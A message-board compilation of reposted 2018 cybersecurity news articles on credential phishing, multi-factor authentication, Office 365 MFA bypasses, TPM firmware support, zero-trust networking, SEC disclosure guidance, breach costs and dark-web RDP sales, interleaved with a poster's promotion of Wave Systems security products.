“The respective self-interest of the government, the private sector and the public have created independence rather than complementary lines of effort and awareness,” Coats said. “Everyone, if we are to succeed in dealing with this threat, must take ownership of the challenge.”
Coats noted that in order to actively counter the threats the country faces, President Donald Trump has authorized several actions, including attribution, criminal indictments and economic sanctions – all of which the administration has recently used.
The director said that the National Security Council, which plays a significant role in the White House’s cybersecurity strategy, is working to make sure the issue of foreign cyberthreats is a top priority for the White House despite being in a “transition period.”
“Transition” is not an understatement. Trump recently brought on John Bolton to replace H. R. McMaster as his national security adviser. Bolton ushered in a series of changes, including nixing the role of White House cybersecurity coordinator. Eliminating the role has been a contentious issue and lawmakers have urged the White House to reinstate it.
Credential Phishing – Easy Steps to Stymie Hackers
There are so many ways that Wave VSC 2.0 is better than the solutions offered up in this article. Interesting that the author use to work for the Army and doesn't mention Virtual Smart Cards or Windows Hello as a MFA solution. Given the author's initial line of, "I have to admit that I am a big fan of hardware-based token," virtual smart cards would seem like his next obvious recommendation.
https://securityboulevard.com/2018/07/credential-phishing-easy-steps-to-stymie-hackers/
Phishing attacks have become a common factor in our daily routines for businesses and in our personal lives. There are many different types of phishing attacks, each of which requires a slightly different defense while having some commonalities as well. This article covers a specific type of attack called credential phishing and ways to protect against it. While you may have heard of this type of attack, many people do not fully understand the different types of credential phishing, their goals, and how to defend against them. Time to remedy that!
Types of Credential Phishing Attacks
Generally speaking, most credential phishing attacks have a common, obvious purpose – to gather credentials from an individual. However, what attackers do with that information and the creativity used in the attack can vary greatly. In some cases, the credentials can be used to gain access to systems or network resources, while in others they can be used to take over bank accounts, social media accounts or email accounts. In any of these cases, the damage the attacker can do can be harmful to the organization or individual, both reputationally and financially.
A couple of months ago, I spent some time in Washington, DC, where I was honored to speak to members of several different House Subcommittees ranging from those focused on financial crimes and terrorism to consumer protection and intelligence services. After one of the briefings, I spent some time speaking with a member of the U.S. Secret Service. He told me a story about a case he just finished working. Sadly, this was a scenario that I already knew too well through others impacted by the same scenario.
In this case, the attacker was able to gain access to an individual’s email account through a credential phishing email. This victim worked in the real estate industry and was working on some reasonably large deals. The attacker stayed quiet and monitored the victims emails for about a month before springing the attack. In this case, when it was time to transfer the escrow funds, the victim sent the account information for the transfer to the sender. Immediately afterword, the attackers made their move, and from the legitimate account of the victim, sent another email with a “correction” to the account number. The result was about $500,000 wired to the attacker’s bank account in another country, and it happened in the blink of an eye.
The FBI calls this kind of attack Business Email Compromise (BEC), and there are many different variations. This escrow/earnest money transfer attack is just one of many. I have seen attacks diverting funds for invoice payments, false invoices being generated and sent from legitimate accounts and malware being spread through legitimate, “trusted” accounts are just a few others. This doesn’t even touch on the CEO fraud versions of this type of attack, which occurs when the CEO makes an urgent request for a funds transfer or to send tax forms for the employees. These attacks are so lucrative, Trend Micro is expecting the losses to exceed $9 billion by the end of this year, and the FBI has already tallied $5.3 billion in losses back in 2016.
In addition to these types of attacks, if you own the user’s email account, password resets for other types of accounts using that email address become trivial.
Fighting Back Against Credential Phishing
So, how do we fight back against these sorts of attacks? Generally speaking, the most effective countermeasures I have seen are:
1.Training the users to spot these attacks
2.Using Multi-Factor Authentication (MFA) to secure the accounts.
When it comes to training users to spot these attacks, we need to understand that the days of the Nigerian prince scams are largely behind us. Modern attacks are well designed and can be tough to recognize.
For example, the following credential phishing pages are from the KnowBe4 simulated phishing platform and are indicative of credential phishing pages used in the wild.
As you can see from the examples, these pages are made to look exactly like the real login pages for these services, and they can be easily hosted on any web server. Most of the time, when the user enters the credentials, the page not only captures those credentials, but it also forwards them to the actual login page, which then logs in the user, and they never know that they just gave up their credentials. Even in cases where the user is not automatically logged in, the page will usually just show a “Bad username or password” error, prompting him/her to log in again. Because all of us have mistyped a password before, this typically goes unnoticed and the user thinks they just fat-fingered the keys, once again leaving them oblivious to the harvesting of their credentials.
We must train users (and ourselves) to hover over the link in emails to ensure they are going to where they say they are, and to glance at the URL bar before ever entering login credentials on a page.
The second thing we need to do is to enable Multi-Factor Authentication (MFA) on these accounts wherever possible. This means not only do you need to have a username/password combination, but you also need to have another means of authentication. This can be biometrics, a text message to your phone, an authenticator app such as Google Authenticator, or, my favorite, a hardware token like a YubiKey.
When I worked for the U.S. Army, we used something called a Common Access Card (CAC) that contained a set of Personal Identity Verification (PIV) certificates that were tied to Active Directory. These PIV certs allowed us to digitally sign emails, encrypt emails, log in to computers on the domain, and even to control physical access to some areas in the buildings. These devices were a 2-Factor Authentication (2FA) device, as they required you to physically have the card, and also required you to know a PIN number to unlock the certificates on the card. Without one or the other, the operation would fail.
This same MFA principle should be applied to the email accounts of your users, especially the sensitive ones. Here are a few types of MFA to consider:
SMS
Using SMS as a second factor is a topic of debate amongst security professionals as cell phones/SIM cards can fairly easily be spoofed. Personally, I believe that something is better than nothing in this regard, so if this is the only option you have, go ahead and use it.
I will caution you, if you enable SMS as a second factor, avoid using numbers that are tied to services that forward SMS to email. For example, if I enable the SMS second factor in my Google account and have the message sent to my Google Voice number, I run the risk of it being more easily intercepted in email and potentially risk locking myself out of my account. Consider this, if I need the SMS message to get in to my Google account, and it’s being sent to my Google account… It’s just better to send it straight to a phone number. Trust me, I have learned from experience.
Software Authenticators
Another option is software-based authenticators such as Google Authenticator or Duo Security. This application is typically set up using a “shared secret” key that then uses that key to generate a numeric code you can enter into the requesting application. For example, if I set this up as a second factor for my Google account, when I log in, I will be prompted to enter the code. I would open the app on the phone and enter the code for that account. Unlike SMS codes, the One-Time Password (OTP) code generated by this type of application has a short lifespan, typically about one minute, before expiring and generating a new code.
Hardware Tokens
I have to admit that I am a big fan of hardware-based tokens. When I used smart cards in the DoD, I gained a great deal of respect for the abilities of these devices. Typically, these hardware devices will be used to generate OTPs or will store the PIV certificates for that user. As I mentioned previously, these hardware generated codes or PIV certificates are a very strong authentication mechanism.
One problem that plagued smart cards in the DoD was a very high failure rate. Our organization had roughly 300 people using these cards with some users having multiple cards for different accounts. In this organization it was not uncommon to replace 2-3 cards a week due to failure. Smart cards have exposed contacts, much like newer chip-enabled credit cards, and require a special reader to be used.
For these reasons, I don’t recommend smart cards for the typical organization, however there are other options that address these issues.
There are a lot of options for similar devices that can make these same improvements in security while being much easier to use and more reliable. A quick search on Amazon for FIDO U2F will give you some options to peruse. Be sure to pick the ones that support your required authentication protocols and methods.
I have been using a device called a YubiKey which is produced by Yubico. These devices act very much like smart cards but plug directly into a USB port and are much more reliable. I have used these devices to store Active Directory PIV certificates and for OTP generation as well. Some of these devices also allow for Near Field Communication (NFC) connectivity as well as USB connectivity. These support multiple authentication protocols and methods including FIDO2, WebAuthN, U2F, smart card (PIV), Yubico OTP, Code Signing, OpenPGP, OATH-TOTP, OATH, HOTP, and Challenge-Response.
Aside from a second factor for account authentication, one of my preferred use cases for these devices is securing password vaults such as LastPass. This allows for a very secure second factor to lock down the vault and associated passwords. The YubiKey Neo is handy, as it can be used through NFC to unlock the password vault even on cell phones.
Another consideration for these devices is the protection of very high-value accounts in Active Directory. I have used these to secure domain and enterprise administrator accounts using smart card login and PIV certificates, which have been natively supported since Windows 2000. That, however, is a topic for another post.
While these devices are typically pretty rugged and convenient, the cost and the requirement to physically have the device can be an issue. I have left my keychain with the YubiKey at home and left on a trip. This can be very inconvenient and can be a challenge to work around if you do not configure a backup method of authentication.
Setting Up MFA
Securing accounts with multi-factor authentication is becoming much easier as more and more vendors add native support for the technologies. Twitter, Facebook, Office 365, Dropbox, GitHub, Google, and many others already allow you to secure your accounts with MFA. Below are a few examples of what these pages look like when enabling MFA.
Summary
Credential phishing and BEC attacks are continuing to cripple organizations across the globe. The attacks are well planned and executed and often very stealthy. Combining high-quality end user training and multi-factor authentication can significantly reduce the risk of damages resulting from a successful credential phish. While this is not a solution to all of the issues surrounding credential phishing, requiring that additional layer of authentication that is tough for the attackers to obtain, can significantly reduce the risk of damage if a user is tricked into giving up their username and password.
The balance between usability and security is always tricky, but the industry as a whole is making it less painful when adding more layers of security. Therefore, review the available options for multi-factor authentication, especially for high value accounts and especially for all email accounts, and your organization as well as you as an individual should enable this additional security wherever possible. Strongly consider the addition of a password vault system as well, which can reduce password reuse across sites and allows for quick, easy password changes.
While nothing is 100% secure, most of these setups are extremely difficult to break. Any determined attacker can eventually get their target. However, these simple measures go a very long way in helping you rise above being the low hanging fruit, making the bad guys simply go on to an easier mark.
Two-factor auth totally locks down Office 365? You may want to check all your services...
A great solution to the problem below. imo.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.theregister.co.uk/2018/07/13/2fa_o365_bypass_attacks/
A network's only as strong as its weakest link or worker
Hackers can potentially obtain access to Microsoft Office 365 emails and calendars even if multi-factor-authentication is in place, we were warned this week.
Cybercrooks are able to force their way into corporate Office 365 accounts, bypassing single sign-on or multi-factor authentication, by targeting older systems that aren't well protected, email security biz Proofpoint has argued.
The trick, we're told, is to target legacy services that use weak or known passwords, are not secured behind multi-factor-authentication, and, once commandeered, can be used to poke around inside a corporate structure. If you don't know a target's password, it could be phished via email or instant message.
This all may seem obvious, but apparently some people are being stung by it.
"The current wave of attacks mostly goes after Exchange Web Services and ActiveSync," said Ryan Kalember, Proofpoint's senior vice president of cybersecurity strategy, earlier this week. "A little real-time phishing gets mixed in, but is usually not necessary."
Real-world examples
For example, Proofpoint said it recently saw an attacker access the Office 365 account of the chief exec of a 15,000-user financial services and insurance firm. The hacker viewed the CEO's emails and calendar in order to sniff out an opportunity to run a sneaky scam.
At the same time the chief exec was in scheduled meetings with suppliers, the intruder used the compromised account to send an email to the chief financial officer asking for funds to be shifted. The unnamed financial services firm lost $1m over the course of several transfers, it is claimed.
Compromised Office 365 accounts in a 75,000-user real-estate investment biz were used to run another scam. Five executives, including some regional general managers, had their accounts compromised. With access to their Office 365 email, attackers managed to change the ABA routing numbers for corporate funds. The company lost over $500,000 as a result, according to Proofpoint.
By the most remarkable of coincidences, the security shop has released something called Proofpoint Cloud Account Defense (CAD) to detect and proactively protect against compromised Microsoft Office 365 accounts. Kalember explained the need for additional layers of defenses.
"It's really hard for most orgs to cover all the interfaces to Exchange with MFA [multi-factor authentication]," Kalember told El Reg.
"Particularly with EWS [Exchange Web Services], you need to be 1) fully migrated to O365, 2) use Microsoft's own MFA, and 3) in Modern Authentication mode. The tech can't support native iOS/Android mail clients, etc."
In other words, you may think you're fully protected – but maybe you should double check, and increase defenses for all service interfaces, particularly concerning Exchange Web Services. Save yourself some pain in the future. ®
From computers to mobile - The TPM could be ready to shine!
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. http://ow.ly/O2Rc30kUnhr
see post 245219 as well.
AMI @AMI_PR has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. https://t.co/bbSRotmudl
— Trusted Computing (@TrustedComputin) July 11, 2018
American Megatrends Adds TPM Support on Arm-based Systems Running Aptio® V UEFI Firmware
see wavesys.com for Wave Endpoint Monitor
https://ami.com/en/news/press-releases/american-megatrends-adds-tpm-support-on-armbased-systems-running-aptio-v-uefi-firmware/
Wednesday: May 2, 2018
NORCROSS, GEORGIA: - American Megatrends Inc. (AMI), a global leader in BIOS and UEFI firmware, server and remote management tools, data storage products and unique solutions based on the Linux® and Android™ operating systems, is pleased to announce support for TPM on Arm®-based systems running AMI’s flagship Aptio® V UEFI Firmware.
The Trusted Platform Module (TPM) is defined in the TPM Main specification created by the Trusted Computing Group, which enables trust in computing platforms. TPM can be used to measure the code that will be executed (known as measured boot), authenticate and secure platforms using passwords, certificates, digital signatures and/or encryption keys. Incorporating TPM provides an extra layer of security to ensure that important information is not prone to outside software attacks and/or unauthorized updates.
Previously, AMI only provided TPM support for x86 platforms. With the growing need to extend TPM support for additional platforms, AMI has added TPM support for Arm-based systems currently running AMI's Aptio® V UEFI firmware. Users can expect the ability to better secure their systems and the information stored within them. The added TPM support for Arm-based systems includes features specifically for the Arm architecture such as TPM driver support within Arm® TrustZone® technology and Linux OS support. The Arm TrustZone TPM Firmware can be accessed by the BIOS and OS via the Command Response Buffer interface using Secure Monitor calls. Other generic features supported by TPM include cryptographic algorithms and measurement of SecureBoot variables.
American Megatrends and Wave to Extend UEFI Support in Windows 8 for BIOS Malware Detection
Friday: February 24, 2012
https://ami.com/en/news/press-releases/american-megatrends-and-wave-to-extend-uefi-support-in-windows-8-for-bios-malware-detection/
Central to Windows 8 is the use of Aptio®, AMI’s solution for UEFI (Unified Extensible Firmware Interface), which represents an overhaul of the computer boot environment, while still bearing similarities to the legacy BIOS (Basic Input Output System) it replaces. The UEFI specification introduces advanced firmware features defining boot and runtime protocols for communications between services, device drivers and offers a standard interface to the operating system. Providing standardized access to boot data optionally stored on either NAND flash or on a hard drive, Aptio provides more space for boot-time diagnostics and running utilities. The result is dramatically faster boot-up times and better performance.
Windows 8 takes advantage of UEFI secure boot architecture to enhance the operating system’s security capabilities. Secure boot allows only signed software to run on the device, adds cryptographic checks to each stage of the boot process and asserts the integrity of all the software images that are executed to prevent unauthorized, modified software from running. Wave solutions report on the execution of the secure boot and verify that anti-malware software has been launched before any third-party boot drivers to prevent malware from bypassing inspection.
Building a “chain of trust” requires the collaboration of multiple partners. AMI provides the first step in the trust chain by assuring that the BIOS components are registered and signed prior to the delivery of the platform. As the computer boots, each component reports its status to the Trusted Platform Module (TPM), which securely records the status measurements. This provides a critical first step that sets the stage for a more trustworthy computing environment.
Wave constitutes the next link in the trust chain with solutions designed to assure that the integrity of the secure boot is reported and attested to the enterprise network or Cloud service. Wave Endpoint Monitor, currently deployed in beta testing, uses the TPM to report on the success of the secure boot and leverages the chip to prove that the process has executed correctly. Endpoint Monitor can then prove to a Cloud service or to an enterprise application that the PC has booted in a known, good state. If a platform is compromised, IT can determine which machine is infected, and take steps to prevent it from accessing sensitive systems to ensure that critical systems and data safe remain safe.
“Securing the computer from power on is critical to the defense of intellectual property and the corporate infrastructure,” remarked S. Shankar, President and CEO of American Megatrends. “AMI is pleased to provide Microsoft with the foundation of security for Windows 8, and to work with Wave to extend security capabilities that wouldn’t have been possible in a legacy environment.”
Steven Sprague, Wave’s CEO commented, “AMI and PC manufacturers offer great assurance that the UEFI components are trusted when delivered to the customer. Wave provides IT with a greater level of knowledge and trust in the boot process and assurances that only known devices are on the network. Knowing the identity of the machine and assuring the health of its BIOS represent significant strides forward in combating advanced persistent threats.”
AMI has spent the last year supporting the launch of Windows 8 by ensuring that AMI’s Aptio UEFI firmware is in full compliance with the latest UEFI specification, UEFI 2.3.1. New features include pre-OS security, speed and secure boot. AMI is also working with PC OEMs, developers and partners such as Wave by providing UEFI development PCs for testing within a Windows 8 ecosystem. AMI has worked in partnership with Microsoft to develop this system in order to facilitate the rapid development of Windows 8 throughout the entire developer community. These new UEFI development PCs are powered by the latest version of Aptio, version 4.6.5.1, which not only offers full support for Windows 8, but also adds support for the latest UEFI specifications, UEFI 2.3.1 and PI 1.2. This makes the latest features of the UEFI specification, such as Secure Boot, UEFI boot mode, fully localizable user interface and more, available to manufacturers in a production-ready UEFI BIOS. Notably, this development system will be the first PC on the market with full UEFI 2.3.1 support, allowing for a complete Windows 8 experience.
In preparation for Windows 8 availability, Wave is using some of the capabilities of the TPM to enable an enterprise infrastructure to support the features in Windows 8 that take advantage of UEFI capabilities. Enterprises stand to benefit from a tool that can detect rootkits, assure the core capabilities of a platform and establish very strong device identity—capabilities that have been missing for the last 20 years and critical to establishing a more trustworthy computing environment.
Phone in the right hand? You're a hacker!
How effective really is a continuous monitoring/automation and assuming all users in the network are hostile (Beyond Corp.) vs. only known devices being allowed on certain parts of the network. The moat approach (anti virus and firewalls) isn't very effective either. imo. Wave's website has the following excerpt:
https://www.wavesys.com/solutions
Much of the complexity, stress, and expense of data protection stems from hanging on to a failed, 20th-century approach to the problem. Namely, piling on layers of software in an attempt to keep the bad guys and their viruses out. But there is no “in” to keep them out of anymore. Consider today’s increasingly mobile workforce, the proliferation of personal devices, and the growing use of web applications—all of which cyber criminals have learned to take advantage of.
The Wave alternative is to start with the device. The security is built in—part of the hardware—not added on. With the device as your foundation, you have unprecedented yet straightforward control over exactly who has access to your data, with what devices, over what networks, which eliminates much of that complexity, stress, and expense. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
https://www.bbc.com/news/technology-44438808
Hackers are finding it too easy to circumvent traditional cyber defences, forcing businesses to rethink their security strategies. Many firms are now harnessing big data and adopting cutting edge verification checks. In fact, some can even identify you by how quickly you type your computer keys, or how you hold your mobile phone.
In these days of regular space travel, nanotechnology and quantum computers it is easy to believe we live in an age plucked from the pages of a science-fiction novel.
But there are some aspects of this shiny, computer-powered era that look more feudal than futuristic.
Consider the way many organisations protect themselves and their staff from cyber-attacks.
Many approach cyber-security like a medieval king would have tackled domestic security - by building a castle to protect themselves, says Dr Robert Blumofe, a senior manager at cloud services firm Akamai.
The high walls, moat and drawbridge are the security tools, anti-virus and firewalls they use to repel the barbarians at the gates trying to breach their cyber defences.
"But now," Dr Blumofe says, "that castle metaphor is really starting to break down."
Outer defences
The first issue is mobility. Digital fortifications worked well when all staff sat at desks, used desktop computers and were concentrated in a few buildings.
But now many work from home, airports or coffee shops and use their laptops, tablets and phones on the go, to work at all times of day.
The second problem, Dr Blumofe says, is that many firms wrongly assume that those in inside their castle walls can be trusted and are "safe".
This leaves many firms dangerously exposed, agrees John Maynard, European head of cyber-security for Cisco.
"Typically once attackers have penetrated a trusted network they find it is easy to move laterally and easy to get to the crown jewels.
"That's because all the defences point outward. Once on the inside there is usually little to stop attackers going where they want to."
Tumbling walls
In a bid to get beyond this outdated thinking many organisations have torn down the old castle walls in favour of a model known as the "Beyond Corp" approach.
It was pioneered by Google in response to a series of cyber-attacks in 2009 called Aurora orchestrated by China-backed hackers. The attackers went after Google as well as Adobe, Yahoo, Morgan Stanley, Dow Chemical and many other large firms.
According to Mr Maynard, Beyond Corp assumes every device or person trying to connect to a network is hostile until they are proven otherwise.
And it obtains this proof by analysing external devices, how they are being used and what information they are submitting.
This encompasses obvious stuff such as login names and passwords, as well as where someone logs in from; but it also relies on far more subtle indicators, says Joe Pindar, a security strategist at Gemalto,
"It can be how quickly do you type the keys, are you holding the device in your right or left hand. How an individual uses a device acts as a second layer of identity and a different kind of fingerprint."
Gathering, storing and analysing all that data on those individual quirks of usage was the type of big data problem only a tech-savvy company such as Google could tackle at the time of the Aurora attacks, says Mr Pindar.
However, as familiarity with big data sets has spread, many more big firms are adopting the Beyond Corp approach when organising their digital defences, he says.
One big advantage is that Beyond Corp turns a firm's network into an active element of defence, says Mr Maynard from Cisco.
"In the castle and moat approach the network was passive... But beyond Corp involves continuous monitoring where you are constantly using the network as a sensor or a way to get telemetry about what's going on."
The analysis done when users join a network makes it much easier to spot when attackers are trying to get access. That's because the authentication step will flag any anomalies meaning security staff will find out quickly that something suspicious is going on. Anything other than normal login behaviour will stand out.
Faster detection
It can also mean a "significant reduction" in time to detect threats, says Mr Maynard.
"The industry average is about 100 days to spot threats. With Beyond Corp you should be down to hours not days."
In addition, Beyond Corp can "limit the blast radius" if a breach does happen, says Stephen Schmidt, chief security officer at Amazon's AWS cloud service.
This is because it usually involves dividing up a company's internal network so users only get access to applications they are approved to use.
The mass of data gathered on users, their devices and the way they act once they have connected may appear bewildering to many companies.
However, advances in automation are increasingly helping them keep a handle on the millions of events that now occur on their systems.
"If you are expecting to secure your estate by having humans watch TV screens you are probably going to be too late to spot it," says Mr Schmidt. "Human reactions are always going to be much slower than automation."
SEC Cybersecurity Update May Lead to Increased Oversight
https://www.infosecurity-magazine.com/opinions/sec-update-increased-oversight/
In direct response to an unprecedented streak of massive data breaches and security incidents, the SEC recently released a statement and guidance on public company cybersecurity disclosures. The SEC's guidance has two major focuses: the importance of cybersecurity policies and procedures and the application of insider trading prohibitions in the cybersecurity context.
While signals are mixed, the SEC appears to view cybersecurity policy and practice as central to protecting markets. To quote from the SEC's February statement: “Today, the importance of data management and technology to business is analogous to the importance of electricity and other forms of power in the past century.”
Prognosis
To be clear, the updated guidance is not a formal regulation, so companies may choose to review and fix policy management issues — or they may ignore it altogether. Savvy corporate information security executives will internalize that this pointed focus on cybersecurity means increased oversight is soon to follow. We see this guidance as a precursor to regulations that could grow into a regime on par with SOX.
This prediction is supported by a few key factors:
Precedent — The New York State Department of Financial Services, 23 NYCRR 500, Cybersecurity Requirements for Financial Services Companies. See also state-level notification laws and the EU’s GDPR.
Avalanche — Financial sector breaches have tripled in five years.
Driver — Investors are seeking risk awareness to ensure they have all the facts for prudent investments.
Most experts and market watchers are discussing the SEC guidance in terms of how public companies will and should react to it. The untold story is that the guidance is likely a precursor to increased oversight. We’ve seen it happen in other sectors with governing bodies, such as in financial services with the FFIEC.
The SEC’s renewed focus on cybersecurity and data breaches is a good news/bad news scenario for CISOs. CISOs can leverage the gravity of SEC oversight into increased visibility and authority in the boardroom, as CEOs and CFOs now have greater risk management responsibility and accountability to investors. On the other hand, CISOs also now face heightened scrutiny and greater accountability, including the potential for more significant personal penalties.
Questions and Concerns
Most public companies are already straining under the weight of regulatory burdens and have invested heavily in their cybersecurity defenses. What more can they do?
The SEC guidance can be seen as a response to, and hedge against, the negative impact of massive breaches on public trust – already at a remarkably low point. Headline-worthy breaches keep happening. The full fallout from the Equifax disaster may still be coming. Target still finds itself getting press five years after its data breach.
While public companies have less and less say over what they disclose, it is important to examine the trust issue from a strategic standpoint: What effect will more disclosures have? What will happen to companies that fail to disclose in a timely and transparent manner? The SEC has already provided one answer, in the form of a $35 million penalty against Altaba (Yahoo) for failing to disclose a massive breach in 2014.
Urging public companies to do a better job of incident response, through integrated policies, procedures, controls, and collaboration, in the event of a breach or cyber-attack is only one part of the guidance.
Another major area of focus is risk management — the SEC emphasizes that investors have a right to be notified of major risk factors, even before a negative event occurs. This means public companies, which often leverage complex global supply chains, will likely need to improve their enterprise risk management programs to gain the visibility and agility required to achieve a proactive state.
Answers and Insights
The next step is to integrate all the components — cybersecurity, data privacy, data integrity, compliance, audit, business resiliency and third-party management — merging and managing them through an integrated risk management program and solution.
These technology platforms support risk management effectiveness and policy management best practices, a core aspect of the SEC update. Organizations with solid integrated risk management programs are able to leverage their visibility into various components – vendor risk, audits, etc. -- to make IT risk management more effective and actionable.
By systematically linking policies to controls, it becomes easier to prove compliance and diligence. The linkages provide a defensible record, essential to withstanding public scrutiny and investigations. Everything can be documented, from the publication and distribution of policies to training and testing, and then investigation, corrective actions, and follow-up reports.
Moreover, policies managed through integrated risk management solutions can be created and updated efficiently in response to business or regulatory changes.
A quick scan of the SEC guidance (and most other cybersecurity directives) reveals a daunting number of details and convoluted processes that need to be addressed. That’s why automation is so vital to achieve excellence in risk management.
Streamlining workflows, centralizing documentation, freeing data from silos, and systematizing processes — all these capabilities save time and money, but they also increase visibility across the enterprise, enable collaboration, and bridge vulnerable gaps.
In the end, the issues raised by the SEC’s updated guidance are important for every organization. Cultivating corporate responsibility, sustaining consumer trust, protecting valuable data assets, and maintaining the integrity of critical ecosystems are all essential to long-term success and competitive advantage.
Digging deep to identify vulnerabilities, track improvements and outcomes, and ensure accountability will create a stronger, more resilient organization.
IBM: A data breach will now cost your organization $3.86 million, if you're lucky
See wavesys.com on how to use better cybersecurity and prevent potential enormous future breach costs. imo.
https://www.zdnet.com/article/ibm-a-data-breach-will-now-cost-your-organization-3-86-million/
There are hidden costs over time which make the bill far larger than you may expect.
A new global study conducted by IBM suggests the financial impact of a data breach for an organization is, on average, $3.86 million.
However, in the worst cases, "mega breaches" may cost the enterprise between $40 million and $350 million.
IBM's 2018 Cost of a Data Breach Study, conducted in conjunction with the Ponemon Institute, suggests that the cost can become this high not due to the obvious damage caused by systems -- or the theft of information at the time of a breach -- but rather due to more subtle expenses incurred by an organization.
A loss of reputation may deter potential future customers, current business relationships may falter, and the time employees must spend on damage control -- as well as retraining and education -- may all rack up the bill.
According to the study, the average cost of a data breach, $3.86 million, has increased by 6.4 percent from 2017.
After interviewing close to 500 companies which have experienced a data breach, the study calculated that this is the average cost when under 100,000 records are compromised in a cybersecurity incident.
The average time it took to uncover a data breach is 197 days, and once identified, it takes roughly 69 days to contain.
However, the speed of incident response teams can have a huge impact on the overall cost of a data breach.
When a breach is contained in less than a month, IBM suggests businesses may be able to save up to $1 million in comparison to slower companies.
The amount of records stolen also has an effect. On average, each record costs $148, but this cost can be mitigated by having an incident response team on hand, as well as by implementing artificial intelligence (AI)-based cybersecurity solutions.
"Organizations that had extensively deployed automated security technologies saved over $1.5 million on the total cost of a breach," IBM says.
The study has also examined the cost of so-called "mega breaches," in which cyberattacks result in the loss of one million to 50 million records. In these cases, enterprise players can expect to lose between $40 million and $350 million -- but one-third of this estimated cost is caused by lost business.
A recent IBM/Harris poll suggested that 75 percent of US consumers would not do business with a company they did not believe would take adequate measures to protect their data. When you consider that this aversion may be for years -- or permanent -- the true cost of data breaches to an organization may be incalculable.
Based on 11 companies experiencing this level of a data breach in the past two years -- such as Equifax and Target -- the study suggests that the majority of these security incidents are malicious rather than caused by human error, and the average time to detect and contain a breach was 365 days.
"While highly publicized data breaches often report losses in the millions, these numbers are highly variable and often focused on a few specific costs which are easily quantified," said Wendi Whitmore, Global Lead for IBM X-Force Incident Response and Intelligence Services (IRIS). "The truth is there are many hidden expenses which must be taken into account such as reputational damage, customer turnover, and operational costs."
"Knowing where the costs lie, and how to reduce them, can help companies invest their resources more strategically and lower the huge financial risks at stake," the executive added.
Hackers dangle a wide variety of phishing hooks beyond email
Wave VSC 2.0 could help protect companies' computers in the face of the phishing that is presented in this article.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.itproportal.com/features/hackers-dangle-a-wide-variety-of-phishing-hooks-beyond-email/
Browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage
A recent report from Barracuda Networks found that 87 per cent of respondents faced an attempted email-based phishing attack in the past year, making it clear that email-based phishing continues to be a major threat vector. But what happens when improved security defences and employee awareness training make email phishing threats less likely to succeed? Well, if nothing else, hackers are smart and resourceful. They just change to phishing tactics beyond email.
Today, most security teams are finally becoming more aware of the large and growing threat of sophisticated phishing attacks that tempt employees outside of email. These new and fast-evolving attack vector targets users with increasingly sophisticated phishing attacks delivered via ads, search results, pop-ups, browser extensions, social media, chat applications, “free” web apps, and more.
Such sneaky socially engineered attacks often appear in an “arena of trust,” like a legitimate website or social media application. They deceive employees into offering up personal credentials or visiting malicious web pages that compromise their browsers and do keylogging and other malevolent actions that are hard for traditional security solutions to detect.
Hackers are preying on human fallibility with HTML-based attacks that evade existing defences by design. Disguised as legitimate web traffic, they slip through firewalls and secure web gateways. And with these new phishing campaign typically lasting just hours, existing threat-based defences can’t keep up with fast-moving attacks. In essence, browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage.
New types of phishing attacks are on the rise
The growing use of the Web, SaaS applications, social media, and other Internet-based resources for daily tasks is making it an increasingly appealing attack vector for hackers. While employees are on the Web or using social media, they are vulnerable to a growing variety of complex phishing attacks outside of their inbox. And with devices such as laptops and phones increasingly being dual use devices, used for both business and personal use, compromises that take place during personal time can compromise a device and help hackers gain entry into corporate networks.
Here is a brief roundup of the most common types of phishing attacks beyond email on the rise today, and why organisations should be on the alert.
Fake logins and credential stealing
It starts out looking real enough. You search for a login page for your Facebook, Google, or Dropbox account at work and come across what appears to be a legitimate page, so you enter your credentials into the phony login. This mistake makes you fair game for attackers to steal your info and get access to your critical files and passwords, and possibly even infiltrate the larger corporate network.
In the example below, attackers provide a custom Dropbox phishing page that allows users to gain access through the trusted email login source of their choice. Regardless of the selection, once the user enters his or her credentials in any of the above logins, the form will submit the stolen information through a php script of the same name as the popup htm. In each php, the attacker has written a code to send the collected information to this email address.
Malicious browser extensions and ads
According to a recent report, Google says it removed 3.2 billion ads from its platforms in 2017, nearly double the total number of “bad ads” from just a year earlier. That equates to removing about 100 ads per second.
Google also reported that cybercriminals infected more than 100,000 computers with browser extensions that stole login credentials, mined cryptocurrencies, and engaged in click fraud. The malicious extensions were hosted in Google’s official Chrome Web Store. These browser extensions and related HTML malware are often promoted via ads, search engines, and social media to trick users through increasingly sophisticated and trustworthy social engineering methods.
rest at link -
Hackers can purchase government login credentials for cheap on the dark web
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
https://www.digitaltrends.com/computing/mcafee-hackers-buy-remote-desktop-access-dark-web/
McAfee’s Advanced Threat Research team recently discovered that hackers have access to many organizations that have weak credentials when using Microsoft’s Remote Desktop component in Windows-based systems. Access to these organizations — whether it’s an airport, a hospital or the U.S. government — can be bought for little money through specific shops on the dark web.
Microsoft’s Remote Desktop Protocol (RDP) essentially allows you to connect and use a Windows-based PC from a remote location. When those login credentials are weak, hackers can use brute force attacks to gain the username and password for each connection. McAfee found connections up for sale across various RDP shops on the dark web ranging between a mere 15 to a staggering 40,000 connections.
“The advertised systems ranged from Windows XP through Windows 10,” says John Fokker, McAfee’sHead of Cyber Investigations. “Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Among the list of devices, services and networks on the menu are multiple government systems on sale worldwide, including those linked to the United States. The team found connections to a variety of healthcare institutions including medical equipment shops, hospitals, and more. They even found access to security and building automation systems at a major international airport selling for a mere $10.
The problem doesn’t just revolve around desktops, laptops, and servers. Internet of Things devices based on Windows Embedded are also on the menu such as point-of-sale systems, kiosks, parking meters, thin client PCs and more. Many are overlooked and not updated, making them a quiet entryway for hackers.
